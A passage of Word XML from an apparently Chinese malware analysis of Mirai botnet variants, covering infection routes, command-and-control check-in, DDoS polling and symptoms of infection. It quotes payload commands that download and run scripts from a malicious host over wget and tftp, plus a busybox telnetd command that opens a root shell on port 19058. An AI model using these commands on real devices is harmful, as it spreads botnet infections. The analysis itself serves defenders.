          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">destination-port 7547 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34ADB" w:rsidRPr="000F6CCA" w:rsidRDefault="00C34ADB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34ADB" w:rsidRDefault="00C34ADB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对随机生成的IP地址进行扫描，向端口31517发送数据包</w:t>
      </w:r>
      <w:r w:rsidR="008637CC">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="6"/>
      </w:r>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用以确认是否被感染，如果未被感染，则向目标主机发送包含攻击代码的数据包</w:t>
      </w:r>
      <w:r w:rsidR="00D32442" w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00900F11" w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一段长度为746的数据包，第二段长度为756的数据包内容，均为XML over</w:t>
      </w:r>
      <w:r w:rsidR="00900F11" w:rsidRPr="000F6CCA">
        <w:t xml:space="preserve"> HTTP内容</w:t>
      </w:r>
      <w:r w:rsidR="002B51AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中内嵌恶意脚本，分别为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B51AB" w:rsidRDefault="002B51AB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd /tmp;wget http://p.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B51AB" w:rsidRPr="000F6CCA" w:rsidRDefault="002B51AB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd /tmp;tftp -l y.sh -r tftp.sh -g p.ocalhost.host;chmod 777 y.sh;./y.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00352BFE" w:rsidRDefault="00352BFE" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E25DC8" w:rsidRPr="00E25DC8" w:rsidRDefault="000F6CCA" w:rsidP="00E25DC8">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>完成以上三个流程之后，回到主流程中。首先查询内置的服务器列表中的IP地址和端口号，尝试进行连接，连接成功则</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发送上线包，数据包中的内容是\x00\x00\x00\x01</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>与主控通信成功后</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会不断查询主控下发的DDoS攻击命令</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRDefault="003E6248">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00262A6F" w:rsidRDefault="00262A6F" w:rsidP="002974EC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc472191674"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai(</w:t>
      </w:r>
      <w:r>
        <w:t>6789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D47DF8">
        <w:t>感染原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00D47DF8" w:rsidRPr="0084698A" w:rsidRDefault="004C6752" w:rsidP="00D47DF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目前已公开</w:t>
      </w:r>
      <w:r w:rsidR="00DD596D" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的消息是</w:t>
      </w:r>
      <w:r w:rsidR="00DD596D" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006E764F" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>大华摄像头</w:t>
      </w:r>
      <w:r w:rsidR="006D30A9" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="006D30A9" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP/6789端口处存在漏洞。</w:t>
      </w:r>
      <w:r w:rsidR="00DD596D" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>被利用后，在设备</w:t>
      </w:r>
      <w:r w:rsidR="007A7702" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上的TCP/</w:t>
      </w:r>
      <w:r w:rsidR="00DD596D" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19058端口开启Telnet</w:t>
      </w:r>
      <w:r w:rsidR="00DD4292" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r w:rsidR="00DD596D" w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4292" w:rsidRPr="00DD4292" w:rsidRDefault="00DD4292" w:rsidP="00DD4292">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4292">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>busybox telnetd -p 19058 -l /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4292" w:rsidRPr="00DD4292" w:rsidRDefault="00DD4292" w:rsidP="00D47DF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文献</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1502115842"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="0084698A">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="0084698A">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="0084698A">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Joh \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="0084698A">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="0084698A">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidRPr="0084698A">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>称此</w:t>
      </w:r>
      <w:r w:rsidR="00E25A46">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="0084698A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是reverse shell应该是不准确的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="003E6248" w:rsidRDefault="00757648" w:rsidP="00757648">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc472191675"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>鉴别与防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRDefault="009235AA" w:rsidP="00E25DC8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc472191676"/>
      <w:r>
        <w:t>受</w:t>
      </w:r>
      <w:r w:rsidR="00757648">
        <w:t>感染主机</w:t>
      </w:r>
      <w:r>
        <w:t>的症状与鉴别方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="009235AA" w:rsidRPr="009235AA" w:rsidRDefault="009235AA" w:rsidP="009235AA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在扫描到IP地址之后，Mirai会通过一系列常用的默认用户名和密码辨别出易受攻击的设备，然后登录这些设备以注入Mirai软件。受感染的设备会继续正常工作，不过偶尔会出现卡顿，而且带宽消耗会增大。设备在重新启动之前将一直保持受感染的状态。设备重启之后，除非用户立刻修改密码，几分钟之内设备很快会被再次感染</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1027376449"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Wik16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009235AA" w:rsidRDefault="009235AA" w:rsidP="009235AA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一个来自波兰的网络管理员发现自己的路由器每隔</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15-</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20分钟就重启一次</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>经检查发现</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NTP服务器配置项多了一行恶意命令</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
